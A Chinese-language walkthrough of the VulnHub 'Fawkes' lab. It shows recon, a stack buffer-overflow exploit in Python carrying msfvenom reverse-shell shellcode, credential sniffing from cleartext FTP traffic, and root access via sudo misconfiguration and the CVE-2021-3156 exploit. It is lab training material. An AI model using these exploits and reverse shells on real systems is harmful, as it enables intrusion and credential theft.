freeBuf
vulnhub靶场攻略---fawkes
2023-09-12 10:47:28

信息收集

└─\# cat nmapscan/info
# Nmap 7.93 scan initiated Tue Aug  1 02:28:13 2023 as: nmap -sT -sV -sC -O -p21,22,80,2222,9898 -o nmapscan/info 10.20.22.134 
Nmap scan report for 10.20.22.134                                                                                              
Host is up (0.00060s latency).                                                                                                 
PORT     STATE SERVICE    VERSION                                                                                              
21/tcp   open  ftp        vsftpd 3.0.3                                                                                         
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                                                         
|_-rwxr-xr-x    1 0        0          705996 Apr 12  2021 server_hogwarts                                                      
| ftp-syst:                                                                                                                    
|   STAT:                                                                                                                      
| FTP server status:                                                                                                           
|      Connected to ::ffff:10.20.22.128                                                                                        
|      Logged in as ftp                                                                                                        
|      TYPE: ASCII                                                                                                             
|      No session bandwidth limit                                                                                              
|      Session timeout in seconds is 300                                                                                       
|      Control connection is plain text                                                                                        
|      Data connections will be plain text                                                                                     
|      At session startup, client count was 5                                                                                  
|      vsFTPd 3.0.3 - secure, fast, stable                                                                                     
|_End of status                                                                                                                
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                       
| ssh-hostkey:                                                                                                                 
|   2048 48df48372594c4746b2c6273bfb49fa9 (RSA)                                                                                
|   256 1e3418175e17958f702f80a6d5b4173e (ECDSA)                                                                               
|_  256 3e795f55553b127596b43ee3837a5494 (ED25519)
80/tcp   open  http       Apache httpd 2.4.38 ((Debian))                                
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)                   
2222/tcp open  ssh        OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:                 
|   3072 c41dd5668524574a864ed9b60069788d (RSA)
|   256 0b31e76726c64d12bf2a8531bf21311d (ECDSA)
|_  256 9bf4bd71fa16ded589ac698d1e93e58a (ED25519)
9898/tcp open  monkeycom?                                      
| fingerprint-strings:                                         
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     Welcome to Hogwart's magic portal                        
|     Tell your spell and ELDER WAND will perform the magic
|     Here is list of some common spells:                      
|     Wingardium Leviosa                                       
|     Lumos                    
|     Expelliarmus             
|     Alohomora                
|     Avada Kedavra            
|     Enter your spell: Magic Output: Oops!! you have given the wrong spell
|     Enter your spell:                                        
|   NULL:                      
|     Welcome to Hogwart's magic portal                        
|     Tell your spell and ELDER WAND will perform the magic
|     Here is list of some common spells:                      
|     Wingardium Leviosa                                       
|     Lumos
|     Expelliarmus             
|     Alohomora                
|     Avada Kedavra            
|_    Enter your spell:                                        
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http
s://nmap.org/cgi-bin/submit.cgi?new-service :                  
SF-Port9898-TCP:V=7.93%I=7%D=8/1%Time=64C8A606%P=x86_64-pc-linux-gnu%r(NUL
SF:L,DE,"Welcome\x20to\x20Hogwart's\x20magic\x20portal\nTell\x20your\x20sp
SF:ell\x20and\x20ELDER\x20WAND\x20will\x20perform\x20the\x20magic\n\nHere\
SF:x20is\x20list\x20of\x20some\x20common\x20spells:\n1\.\x20Wingardium\x20
SF:Leviosa\n2\.\x20Lumos\n3\.\x20Expelliarmus\n4\.\x20Alohomora\n5\.\x20Av
SF:ada\x20Kedavra\x20\n\nEnter\x20your\x20spell:\x20")%r(GenericLines,125,
SF:"Welcome\x20to\x20Hogwart's\x20magic\x20portal\nTell\x20your\x20spell\x
SF:20and\x20ELDER\x20WAND\x20will\x20perform\x20the\x20magic\n\nHere\x20is
SF:\x20list\x20of\x20some\x20common\x20spells:\n1\.\x20Wingardium\x20Levio
SF:sa\n2\.\x20Lumos\n3\.\x20Expelliarmus\n4\.\x20Alohomora\n5\.\x20Avada\x
SF:20Kedavra\x20\n\nEnter\x20your\x20spell:\x20Magic\x20Output:\x20Oops!!\
SF:x20you\x20have\x20given\x20the\x20wrong\x20spell\n\nEnter\x20your\x20sp
SF:ell:\x20")%r(GetRequest,125,"Welcome\x20to\x20Hogwart's\x20magic\x20por
SF:tal\nTell\x20your\x20spell\x20and\x20ELDER\x20WAND\x20will\x20perform\x
SF:20the\x20magic\n\nHere\x20is\x20list\x20of\x20some\x20common\x20spells:
SF:\n1\.\x20Wingardium\x20Leviosa\n2\.\x20Lumos\n3\.\x20Expelliarmus\n4\.\
SF:x20Alohomora\n5\.\x20Avada\x20Kedavra\x20\n\nEnter\x20your\x20spell:\x2
SF:0Magic\x20Output:\x20Oops!!\x20you\x20have\x20given\x20the\x20wrong\x20
SF:spell\n\nEnter\x20your\x20spell:\x20")%r(HTTPOptions,125,"Welcome\x20to
SF:\x20Hogwart's\x20magic\x20portal\nTell\x20your\x20spell\x20and\x20ELDER
SF:\x20WAND\x20will\x20perform\x20the\x20magic\n\nHere\x20is\x20list\x20of
SF:\x20some\x20common\x20spells:\n1\.\x20Wingardium\x20Leviosa\n2\.\x20Lum
SF:os\n3\.\x20Expelliarmus\n4\.\x20Alohomora\n5\.\x20Avada\x20Kedavra\x20\
SF:n\nEnter\x20your\x20spell:\x20Magic\x20Output:\x20Oops!!\x20you\x20have
SF:\x20given\x20the\x20wrong\x20spell\n\nEnter\x20your\x20spell:\x20")%r(R
SF:TSPRequest,125,"Welcome\x20to\x20Hogwart's\x20magic\x20portal\nTell\x20
SF:your\x20spell\x20and\x20ELDER\x20WAND\x20will\x20perform\x20the\x20magi
SF:c\n\nHere\x20is\x20list\x20of\x20some\x20common\x20spells:\n1\.\x20Wing
SF:ardium\x20Leviosa\n2\.\x20Lumos\n3\.\x20Expelliarmus\n4\.\x20Alohomora\
SF:n5\.\x20Avada\x20Kedavra\x20\n\nEnter\x20your\x20spell:\x20Magic\x20Out
SF:put:\x20Oops!!\x20you\x20have\x20given\x20the\x20wrong\x20spell\n\nEnte
SF:r\x20your\x20spell:\x20");                                  
MAC Address: 00:0C:29:CC:67:05 (VMware)                        
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose                                   
Running: Linux 4.X|5.X                                         
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6                                   
Network Distance: 1 hop                                        
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug  1 02:29:14 2023 -- 1 IP address (1 host up) scanned in 61.12 seconds
//从8989端口的信息大致判断出可能存在缓存区溢出的漏洞

端口渗透

ftp-21端口渗透

└─\# ftp 10.20.22.134
Connected to 10.20.22.134.
220 (vsFTPd 3.0.3)
Name (10.20.22.134:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||18099|)
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0          705996 Apr 12  2021 server_hogwarts
226 Directory send OK.
ftp> 
//使用匿名登录拿到一个linux的可执行的32位文件
└─\# file server_hogwarts 
server_hogwarts: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, BuildID[sha1]=1d09ce1a9929b282f26770218b8d247716869bd0, for GNU/Linux 3.2.0, not stripped

web-80端口渗透

web端的渗透只有一张图片,将图片下载也没有找到隐写文件。也没有找到网站使用的框架,同时目录爆破也找不到任何信息,找不到任何可利用的地方

8989端口渗透

该端口开启了一个类似于web的服务,在浏览器中访问只输出静态页面

└─\# nc 10.20.22.134 9898    
Welcome to Hogwart's magic portal
Tell your spell and ELDER WAND will perform the magic

Here is list of some common spells:
1. Wingardium Leviosa
2. Lumos
3. Expelliarmus
4. Alohomora
5. Avada Kedavra 

Enter your spell: 2
Magic Output: Oops!! you have given the wrong spell

Enter your spell: 2
Magic Output: Oops!! you have given the wrong spell

Enter your spell: 32
Magic Output: Oops!! you have given the wrong spell

Enter your spell: 

使用nc连接后出现可以交互的界面可以向其中输入,在连续输入一百多个字符时程序会出现崩溃,同时发现ftp中得到的文件在执行后不出现回显,查看端口开放情况后找到开启了本地的8989端口。

└─\# nc 127.0.0.1 9898
Welcome to Hogwart's magic portal
Tell your spell and ELDER WAND will perform the magic

Here is list of some common spells:
1. Wingardium Leviosa
2. Lumos
3. Expelliarmus
4. Alohomora
5. Avada Kedavra 

Enter your spell: 

在本地也可以执行该程序,使用本地的edb_debugger进行测试
![[Screenshot_2023-08-01_08_42_38.png]]
该软件类似于windows中的immunity Debugger可以分析程序运行中cpu中寄存器的存储情况。

连接测试多少字节会出现溢出

#!/usr/bin/python
import socket
import time
import sys
size = 100
while True:
    try:
        print("Now use size is %s"%size)
        buffer = 'A' * size
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("127.0.0.1",9898))
        s.send(buffer)
        s.close

        size += 100
        time.sleep(3)
    except:
        print("connected refuse")
        sys.exit()
└─\# python2 exp.py
Now use size is 100        
connected refuse
//在到size加到200时连接被断开出现溢出程序被暂停pause

测试具体在那个字节处溢出并且溢出到那个寄存器

使用msf生成一个长度为200字节的字符串

└─\# msf-pattern_create -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
#!/usr/bin/python
import socket
import time
import sys
try:
        buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag'
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("127.0.0.1",9898))
        s.send(buffer)
        s.close
        time.sleep(3)
except:
        sys.exit()

在edb_debugger中找到EIP指针寄存器的内存地址,cpu的内存是自上而下执行,EIP指针的地址指向下一个内存地址(这里是我自己的理解)
![[Screenshot_2023-08-01_09_17_46 1.png]]
看到EIP的地址为64413764也就是程序从这个地址以后出现溢出

└─\# msf-pattern_offset -l 200 -q 64413764
[*] Exact match at offset 112

使用msf对字节进行追踪,找到是在112位以后出现的溢出,也就是113,114,115,116是EIP寄存器的地址,同时溢出的数据被写到了ESP栈寄存器中。

ESP寄存器扩容

由于我们写入的payload可能会需要相对长的字节长度,所以对ESP寄存器进行适当的扩容

#!/usr/bin/python
import socket
import time
import sys
try:
        buffer = "A" * 112 + "B" * 4 + "C" * 500
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("127.0.0.1",9898))
        s.send(buffer)
        s.close
        time.sleep(3)
except:
        sys.exit()

![[Screenshot_2023-08-01_09_28_23.png]]
可以看到溢出的字符串被写到ESP寄存器中

定位ESP地址

EIP会在EAX溢出后将地址指向ESP,从而将字节存到ESP寄存器中,因此找到ESP的地址将反弹shell的payload写入到ESP寄存器中,在汇编指令中也就是jmp esp指令对应的地址。使用edb-debugger中的opcode search可以找到jmp esp的地址
![[Screenshot_2023-08-01_09_33_28.png]]

生成payload

└─\# msfvenom -p linux/x86/shell_reverse_tcp lhost=10.20.22.128 lport=4545 -b "\x00" -e x86\shikata_ga_nai -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
[-] Skipping invalid encoder x86shikata_ga_nai
[!] Couldn't find encoder to use
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x14\x16"
"\x80\x68\x02\x00\x11\xc1\x89\xe1\xb0\x66\x50\x51\x53\xb3"
"\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

#!/usr/bin/python
import socket
import time
import sys
try:
        payload = ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
                    "\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x14\x16"
                    "\x80\x68\x02\x00\x11\xc1\x89\xe1\xb0\x66\x50\x51\x53\xb3"
                    "\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
                    "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
        buffer = "A" * 112 + "\x55\x9d\x04\x08" + "\x90" * 16 + payload
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("127.0.0.1",9898))
        s.send(buffer)
        s.close
        time.sleep(3)
except:
        sys.exit()
                    
//将ESP地址写入 "\x90"表示nop空操作,由于使用了shikata_ga_nai编码,就需要在payload前加入16位的空操作。

执行脚本接收到反弹shell可能存在端口占用4545端口无法接受反弹shell,但是在443端口的脚本可以成功接收到反弹shell

└─\# nc -lvnp 443
listening on [any] 443 ...
connect to [10.20.22.128] from (UNKNOWN) [10.20.22.134] 33056
whoami
harry
ls -liah
total 60K    
 264484 drwxr-sr-x    1 harry    harry       4.0K Aug  1 14:49 .
 264483 drwxr-xr-x    1 root     root        4.0K Apr 13  2021 ..
 264485 lrwxrwxrwx    1 root     harry          9 Apr 13  2021 .ash_history -> /dev/null
 264466 -rw-r--r--    1 root     harry         24 Apr 13  2021 .mycreds.txt
 389974 -rw-------    1 harry    harry     312.0K Aug  1 14:49 core
cat .mycreds.txt
HarrYp0tter@Hogwarts123

查询到类似于密码的字符串

获取初始立足点

ssh-22端口渗透

└─# ssh harry@10.20.22.134        
harry@10.20.22.134's password: 
 
Permission denied, please try again.
harry@10.20.22.134's password: 
Permission denied, please try again.
harry@10.20.22.134's password: 

无法成功登录

ssh-2222端口渗透

在前期信息收集中找到了2222端口也开启了ssh服务

└─# ssh harry@10.20.22.134 -p 2222
harry@10.20.22.134's password: 
Permission denied, please try again.
harry@10.20.22.134's password: 
Permission denied, please try again.
harry@10.20.22.134's password: 
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

2b1599256ca6:~$ whoami
harry
2b1599256ca6:~$ 

得到了较为完整的会话

2b1599256ca6:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

但是IP地址并非靶机ip地址,判断可能存在docker环境

权限提升

Docker提权

2b1599256ca6:~$ sudo -l
User harry may run the following commands on 2b1599256ca6:
    (ALL) NOPASSWD: ALL
2b1599256ca6:~$ sudo /bin/ash
2b1599256ca6:/home/harry# whoami
root
2b1599256ca6:/home/harry# 

harry用户有root用户的所有权限,并且通过查看passwd文件知道root用户使用的SHELL会话为ash。

2b1599256ca6:/home/harry# cd /root
2b1599256ca6:~# ls
horcrux1.txt  note.txt
2b1599256ca6:~# cat note.txt 
Hello Admin!!

We have found that someone is trying to login to our ftp server by mistake.You are requested to analyze the traffic and figure out the user.

在root家目录下找到flag同时还有一个note文件,文件中提到有人一直在尝试登录ftp服务,查看一下ftp服务的日志信息

Tue Aug  1 23:02:02 2023 [pid 19] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:04:01 2023 [pid 39] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:04:03 2023 [pid 38] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:06:01 2023 [pid 53] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:06:03 2023 [pid 52] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:08:01 2023 [pid 66] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:08:03 2023 [pid 65] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:10:01 2023 [pid 78] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:10:04 2023 [pid 77] [neville] FAIL LOGIN: Client "172.17.0.1"
2b1599256ca6:/var/log# 

只截取了一部分,所有的日志显示了从开了这台靶机一直到现在渗透的过程中这个请求一直在发送,所以要使用tcpdump抓包进行流量分析,判断这个请求是在干什么。这里也可使用其他抓包工具。

23:14:01.941787 IP 172.17.0.1.47240 > 2b1599256ca6.21: Flags [P.], seq 1:15, ack 21, win 502, options [nop,nop,TS val 1053542475 ecr 2894985301], length 14: FTP: USER neville
23:14:01.941789 IP 2b1599256ca6.21 > 172.17.0.1.47240: Flags [.], ack 15, win 510, options [nop,nop,TS val 2894985302 ecr 1053542475], length 0
23:14:01.941811 IP 2b1599256ca6.21 > 172.17.0.1.47240: Flags [P.], seq 21:55, ack 15, win 510, options [nop,nop,TS val 2894985302 ecr 1053542475], length 34: FTP: 331 Please specify the password.
23:14:01.941836 IP 172.17.0.1.47240 > 2b1599256ca6.21: Flags [P.], seq 15:30, ack 55, win 502, options [nop,nop,TS val 1053542475 ecr 2894985302], length 15: FTP: PASS bL!Bsg3k

可以看到用户neville在访问服务并且在验证而且密码为明文密码

横向移动

└─\# ssh neville@10.20.22.134             
neville@10.20.22.134's password: 
Linux Fawkes 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug  1 22:48:48 2023 from 172.17.0.2
neville@Fawkes:~$ 

22端口的ssh服务可直接登录,说明2222端口的ssh服务是为了docker用户登录开放的服务。

内核提权

neville@Fawkes:~$ sudo --version
Sudo version 1.8.27
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27
neville@Fawkes:~$ uname -a
Linux Fawkes 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux

漏洞发生的原因在于sudo错误地转义了参数中的反斜杠。
通常,通过shell(sudo -s或sudo -i)运行命令行时,sudo会转义特殊字符。但 -s 或 -i 也可能被用来运行sudoedit,在这种情况下,实际上特殊字符没有被转义,这就可能导致缓冲区溢出。异曲同工。
直接使用github上面的利用
https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py

┌──(root㉿kali)-[/home/kali/vulnhub/Fawkes]
└─\# nc 10.20.22.134 4444 < exploit_nss.py -w 1
neville@Fawkes:/tmp$ nc -lvnp 4444 > /tmp/exploit_nss.py
listening on [any] 4444 ...
connect to [10.20.22.134] from (UNKNOWN) [10.20.22.128] 51956
neville@Fawkes:/tmp$ ls
exploit_nss.py
\# whoami
root
\# cd /root
\# ls
horcrux3.txt
\# cat horcruc3.txt
cat: horcruc3.txt: No such file or directory
\# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:cc:67:05 brd ff:ff:ff:ff:ff:ff
    inet 10.20.22.134/24 brd 10.20.22.255 scope global dynamic ens33
       valid_lft 138sec preferred_lft 138sec
    inet6 fe80::20c:29ff:fecc:6705/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:42:3f:6b:86 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:42ff:fe3f:6b86/64 scope link 
       valid_lft forever preferred_lft forever
5: vethb557bee@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether be:44:5d:f2:20:78 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::bc44:5dff:fef2:2078/64 scope link 
       valid_lft forever preferred_lft forever
//命令前面的/是为了转义的

到这里跳过docker成功拿到机器的root权限。

本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
文章目录